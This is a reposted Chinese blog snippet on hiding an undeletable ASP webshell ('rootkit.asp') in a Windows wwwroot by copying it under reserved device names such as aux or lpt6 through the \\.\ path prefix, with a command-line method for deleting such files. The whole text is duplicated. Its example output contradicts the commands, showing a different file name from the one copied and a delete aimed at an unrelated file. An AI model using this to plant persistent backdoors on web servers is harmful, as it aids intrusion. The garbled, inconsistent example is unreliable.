【轉】webshell中的不死殭屍和隱藏後門的原理以及刪除
阿新 • • 發佈:2019-01-08
主要是利用系統保留檔名建立無法刪除的webshell來隱藏後門。
Windows 下不能夠以下面這些字樣來命名檔案或資料夾:
aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9
但是通過cmd的copy命令即可實現:
D:\wwwroot>copy rootkit.asp \\.\D:\wwwroot\aux.test.asp 前面必須有\\.\,並且aux等關鍵字必須在前面
已複製1 個檔案。
D:\wwwroot>dir
2011-04-25 14:41 <DIR> .
2011-04-25 14:41 <DIR> ..
2011-03-08 22:50 42,756 aux.asp
2009-05-02 03:02 9,083 index.asp
2012-03-08 22:50 42,756 rootkit.asp
這類檔案無法在圖形介面刪除,只能在命令列下刪除:
del D:\wwwroot>del \\.\D:\wwwroot\lpt6.chouwazi.com.asp
Windows 下不能夠以下面這些字樣來命名檔案或資料夾:
aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9
但是通過cmd的copy命令即可實現:
D:\wwwroot>copy rootkit.asp \\.\D:\wwwroot\aux.test.asp 前面必須有\\.\,並且aux等關鍵字必須在前面
已複製1 個檔案。
D:\wwwroot>dir
2011-04-25 14:41 <DIR> .
2011-04-25 14:41 <DIR> ..
2011-03-08 22:50 42,756 aux.asp
2009-05-02 03:02 9,083 index.asp
2012-03-08 22:50 42,756 rootkit.asp
這類檔案無法在圖形介面刪除,只能在命令列下刪除:
del D:\wwwroot>del \\.\D:\wwwroot\lpt6.chouwazi.com.asp